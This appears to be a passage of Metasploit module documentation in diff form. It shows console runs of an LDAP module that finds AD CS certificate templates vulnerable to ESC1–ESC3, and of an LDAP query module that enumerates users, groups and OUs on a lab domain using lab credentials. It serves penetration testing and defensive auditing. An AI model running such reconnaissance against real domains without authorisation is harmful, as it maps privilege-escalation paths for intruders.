+   BIND_DN               DAFOREST\Administrator  no        The username to authenticate to LDAP server
+   BIND_PW               theAdmin123             no        Password for the BIND_DN
+   REPORT_NONENROLLABLE  false                   yes       Report nonenrollable certificate templates
+   RHOSTS                172.26.104.157          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-
+                                                           Metasploit
+   RPORT                 389                     yes       The target port
+   SSL                   false                   no        Enable SSL on the LDAP connection
+
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
+[*] Running module against 172.26.104.157
+
+[*] Discovering base DN automatically
+[+] 172.26.104.157:389 Discovered base DN: DC=daforest,DC=com
+[*] Template: SubCA
+[*]    Distinguished Name: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC1-Template
+[*]    Distinguished Name: CN=ESC1-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC2-Template
+[*]    Distinguished Name: CN=ESC2-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC3-Template1
+[*]    Distinguished Name: CN=ESC3-Template1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: User
+[*]    Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: Administrator
+[*]    Distinguished Name: CN=Administrator,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: Machine
+[*]    Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-515 (Domain Computers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: DomainController
+[*]    Distinguished Name: CN=DomainController,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-498 (Enterprise Read-only Domain Controllers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-516 (Domain Controllers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]       * S-1-5-9 (Enterprise Domain Controllers)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC3-Template2
+[*]    Distinguished Name: CN=ESC3-Template2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > 
+```
+
+### Windows Server 2022 with ADCS and REPORT_NONENROLLABLE Set To TRUE
+```
+msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOST 172.26.104.157
+RHOST => 172.26.104.157
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_DN DAFOREST\\Administrator
+BIND_DN => DAFOREST\Administrator
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_PW theAdmin123
+BIND_PW => theAdmin123
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set REPORT_NONENROLLABLE true
+REPORT_NONENROLLABLE => true
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options
+
+Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):
+
+   Name                  Current Setting         Required  Description
+   ----                  ---------------         --------  -----------
+   BASE_DN                                       no        LDAP base DN if you already have it
+   BIND_DN               DAFOREST\Administrator  no        The username to authenticate to LDAP server
+   BIND_PW               theAdmin123             no        Password for the BIND_DN
+   REPORT_NONENROLLABLE  true                    yes       Report nonenrollable certificate templates
+   RHOSTS                172.26.104.157          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-
+                                                           Metasploit
+   RPORT                 389                     yes       The target port
+   SSL                   false                   no        Enable SSL on the LDAP connection
+
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
+[*] Running module against 172.26.104.157
+
+[*] Discovering base DN automatically
+[+] 172.26.104.157:389 Discovered base DN: DC=daforest,DC=com
+[*] Template: CA
+[*]    Distinguished Name: CN=CA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    CA not published as an enrollable certificate!
+[*] Template: SubCA
+[*]    Distinguished Name: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: OfflineRouter
+[*]    Distinguished Name: CN=OfflineRouter,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1, ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    OfflineRouter not published as an enrollable certificate!
+[*] Template: ESC1-Template
+[*]    Distinguished Name: CN=ESC1-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC2-Template
+[*]    Distinguished Name: CN=ESC2-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: EnrollmentAgent
+[*]    Distinguished Name: CN=EnrollmentAgent,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    EnrollmentAgent not published as an enrollable certificate!
+[*] Template: EnrollmentAgentOffline
+[*]    Distinguished Name: CN=EnrollmentAgentOffline,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    EnrollmentAgentOffline not published as an enrollable certificate!
+[*] Template: MachineEnrollmentAgent
+[*]    Distinguished Name: CN=MachineEnrollmentAgent,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    MachineEnrollmentAgent not published as an enrollable certificate!
+[*] Template: CEPEncryption
+[*]    Distinguished Name: CN=CEPEncryption,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    CEPEncryption not published as an enrollable certificate!
+[*] Template: ESC3-Template1
+[*]    Distinguished Name: CN=ESC3-Template1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_1
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: User
+[*]    Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: UserSignature
+[*]    Distinguished Name: CN=UserSignature,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    UserSignature not published as an enrollable certificate!
+[*] Template: SmartcardUser
+[*]    Distinguished Name: CN=SmartcardUser,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    SmartcardUser not published as an enrollable certificate!
+[*] Template: ClientAuth
+[*]    Distinguished Name: CN=ClientAuth,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    ClientAuth not published as an enrollable certificate!
+[*] Template: SmartcardLogon
+[*]    Distinguished Name: CN=SmartcardLogon,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[!]    SmartcardLogon not published as an enrollable certificate!
+[*] Template: Administrator
+[*]    Distinguished Name: CN=Administrator,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: Machine
+[*]    Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-515 (Domain Computers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: DomainController
+[*]    Distinguished Name: CN=DomainController,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-498 (Enterprise Read-only Domain Controllers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-516 (Domain Controllers)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]       * S-1-5-9 (Enterprise Domain Controllers)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Template: ESC3-Template2
+[*]    Distinguished Name: CN=ESC3-Template2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*]    Vulnerable to: ESC3_TEMPLATE_2
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users)
+[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * daforest-WIN-BR0CCBA815B-CA
+[*]          Server: WIN-BR0CCBA815B.daforest.com
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > 
+```
@@ -0,0 +1,598 @@
+## Vulnerable Application
+This module allows users to query an LDAP server using either a custom LDAP query, or
+a set of LDAP queries under a specific category. Users can also specify a JSON or YAML
+file containing custom queries to be executed using the `RUN_QUERY_FILE` action.
+If this action is specified, then `QUERY_FILE_PATH` must be a path to the location
+of this JSON/YAML file on disk.
+
+Users can also run a single query by using the `RUN_SINGLE_QUERY` option and then setting
+the `QUERY_FILTER` datastore option to the filter to send to the LDAP server and `QUERY_ATTRIBUTES`
+to a comma seperated string containing the list of attributes they are interested in obtaining
+from the results.
+
+As a third option can run one of several predefined queries by setting `ACTION` to the
+appropriate value. These options will be loaded from the `ldap_queries_default.yaml` file
+located in the MSF configuration directory, located by default at `~/.msf4/ldap_queries_default.yaml`.
+
+Note that you can override the default query settings in this way by defining a query with an
+action name that is the same as one of existing actions in the file at
+`data/auxiliary/gather/ldap_query/ldap_queries_default.yaml`. This will however prevent any updates
+for that action that may be made to the `data/auxiliary/gather/ldap_query/ldap_queries_default.yaml`
+file, which may occur as part of Metasploit updates/upgrades, from being used though, so keep this
+in mind when using the `~/.msf4/ldap_queries_default.yaml` file.
+
+All results will be returned to the user in table, CSV or JSON format, depending on the value
+of the `OUTPUT_FORMAT` datastore option. The characters `||` will be used as a delimiter
+should multiple items exist within a single column.
+
+## Verification Steps
+
+1. Do: `use auxiliary/gather/ldap_query`
+2. Do: `set ACTION <target action>`
+3. Do: `set RHOSTS <target IP(s)>`
+4. Optional: `set RPORT <target port>` if target port is non-default.
+5: Optional: `set SSL true` if the target port is SSL enabled.
+6: Do: `run`
+
+## Options
+
+### OUTPUT_FORMAT
+The output format to use. Can be either `csv`, `table` or `json` for
+CSV, Rex table output, or JSON output respectively.
+
+### BASE_DN
+The LDAP base DN if already obtained. If not supplied, the module will
+automatically attempt to find the base DN for the target LDAP server.
+
+### QUERY_FILE_PATH
+If the `ACTION` is set to `RUN_QUERY_FILE`, then this option is required and
+must be set to the full path to the JSON or YAML file containing the queries to
+be run.
+
+The file format must follow the following convention:
+
+```
+queries:
+  - action: THE ACTION NAME
+    description: "THE ACTION DESCRIPTION"
+    filter: "THE LDAP FILTER"
+    attributes:
+      - dn
+      - displayName
+      - name
+      - description
+```
+
+Where `queries` is an array of queries to be run, each containing an `action` field
+containing the name of the action to be run, a `description` field describing the
+action, a `filter` field containing the filter to send to the LDAP server
+(aka what to search on), and the list of attributes that we are interested in from
+the results as an array.
+
+### QUERY_FILTER
+Used only when the `RUN_SINGLE_QUERY` action is used. This should be set to the filter
+aka query that you want to send to the target LDAP server.
+
+### QUERY_ATTRIBUTES
+Used only when the `RUN_SINGLE_QUERY` action is used. Should be a comma separated list
+of attributes to display from the full result set for each entry that was returned by the
+target LDAP server. Used to filter the results down to manageable sets of data.
+
+## Scenarios
+
+### RUN_SINGLE_QUERY with Table Output
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.27.51.83
+RHOSTS => 172.27.51.83
+msf6 auxiliary(gather/ldap_query) > set ACTION RUN_SINGLE_QUERY
+ACTION => RUN_SINGLE_QUERY
+msf6 auxiliary(gather/ldap_query) > set QUERY_ATTRIBUTES dn,displayName,name
+QUERY_ATTRIBUTES => dn,displayName,name
+msf6 auxiliary(gather/ldap_query) > set QUERY_FILTER (objectClass=*)
+QUERY_FILTER => (objectClass=*)
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.27.51.83
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.27.51.83:389 Discovered base DN: DC=daforest,DC=com
+[*] Sending single query (objectClass=*) to the LDAP server...
+[*] DC=daforest DC=com
+==================
+
+ Name  Attributes
+ ----  ----------
+ name  daforest
+
+[*] CN=Users DC=daforest DC=com
+===========================
+
+ Name  Attributes
+ ----  ----------
+ name  Users
+
+[*] CN=Computers DC=daforest DC=com
+===============================
+
+ Name  Attributes
+ ----  ----------
+ name  Computers
+
+*cut for brevity*
+
+[*] CN=WAPPS1000022 OU=TST OU=Tier 1 DC=daforest DC=com
+===================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WAPPS1000022
+ name         WAPPS1000022
+
+[*] CN=WLPT1000014 OU=AZR OU=Stage DC=daforest DC=com
+=================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WLPT1000014
+ name         WLPT1000014
+
+[*] CN=WWKS1000016 OU=T1-Roles OU=Tier 1 OU=Admin DC=daforest DC=com
+================================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WWKS1000016
+ name         WWKS1000016
+
+[*] CN=WVIR1000013 OU=Test OU=BDE OU=Tier 2 DC=daforest DC=com
+==========================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WVIR1000013
+ name         WVIR1000013
+ 
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### RUN_QUERY_FILE with Table Output
+
+Here is the sample query file we will be using:
+
+```
+$ cat test.yaml
+---
+queries:
+  - action: ENUM_USERS
+    description: "Enumerate users"
+    filter: "(|(objectClass=inetOrgPerson)(objectClass=user)(sAMAccountType=805306368)(objectClass=posixAccount))"
+    columns:
+      - dn
+      - displayName
+      - name
+      - description
+  - action: ENUM_ORGUNITS
+    description: "Enumerate organizational units"
+    filter: "(objectClass=organizationalUnit)"
+    columns:
+      - dn
+      - displayName
+      - name
+      - description
+  - action: ENUM_GROUPS
+    description: "Enumerate groups"
+    filter: "(|(objectClass=group)(objectClass=groupOfNames)(groupType:1.2.840.113556.1.4.803:=2147483648)(objectClass=posixGroup))"
+    columns:
+      - dn
+      - name
+      - groupType
+      - memberof
+```
+
+Here is the results of using this file with the `RUN_QUERY_FILE` action which will
+run all queries within the file one after another.
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.27.51.83
+RHOSTS => 172.27.51.83
+msf6 auxiliary(gather/ldap_query) > set ACTION RUN_QUERY_FILE 
+ACTION => RUN_QUERY_FILE
+msf6 auxiliary(gather/ldap_query) > set QUERY_FILE_PATH /home/gwillcox/git/metasploit-framework/test.yaml
+QUERY_FILE_PATH => /home/gwillcox/git/metasploit-framework/test.yaml
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name             Current Setting                     Required  Description
+   ----             ---------------                     --------  -----------
+   BASE_DN                                              no        LDAP base DN if you already have it
+   BIND_DN          normal@daforest.com                 no        The username to authenticate to LDAP server
+   BIND_PW          thePassword123                      no        Password for the BIND_DN
+   OUTPUT_FORMAT    table                               yes       The output format to use (Accepted: csv, table, json)
+   QUERY_FILE_PATH  /home/gwillcox/git/metasploit-fram  no        Path to the JSON or YAML file to load and run queries from
+                    ework/test.yaml
+   RHOSTS           172.27.51.83                        yes       The target host(s), see https://github.com/rapid7/metasploit-f
+                                                                  ramework/wiki/Using-Metasploit
+   RPORT            389                                 yes       The target port
+   SSL              false                               no        Enable SSL on the LDAP connection
+
+
+Auxiliary action:
+
+   Name            Description
+   ----            -----------
+   RUN_QUERY_FILE  Execute a custom set of LDAP queries from the JSON or YAML file specified by QUERY_FILE.
+
+
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.27.51.83
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.27.51.83:389 Discovered base DN: DC=daforest,DC=com
+[*] Loading queries from /home/gwillcox/git/metasploit-framework/test.yaml...
+[*] Running ENUM_USERS...
+[*] CN=Administrator CN=Users DC=daforest DC=com
+============================================
+
+ Name         Attributes
+ ----         ----------
+ description  Built-in account for administering the computer/domain
+ name         Administrator
+
+[*] CN=Guest CN=Users DC=daforest DC=com
+====================================
+
+ Name         Attributes
+ ----         ----------
+ description  Built-in account for guest access to the computer/domain
+ name         Guest
+
+*cut for brevity*
+
+[*] Running ENUM_ORGUNITS...
+[*] OU=Domain Controllers DC=daforest DC=com
+========================================
+
+ Name         Attributes
+ ----         ----------
+ description  Default container for domain controllers
+ name         Domain Controllers
+
+[*] OU=Admin DC=daforest DC=com
+===========================
+
+ Name  Attributes
+ ----  ----------
+ name  Admin
+
+[*] OU=Tier 0 OU=Admin DC=daforest DC=com
+=====================================
+
+ Name  Attributes
+ ----  ----------
+ name  Tier 0
+
+*cut for brevity*
+
+[*] Running ENUM_GROUPS...
+[*] CN=Administrators CN=Builtin DC=daforest DC=com
+===============================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Administrators
+
+[*] CN=Users CN=Builtin DC=daforest DC=com
+======================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Users
+
+[*] CN=Guests CN=Builtin DC=daforest DC=com
+=======================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Guests
+
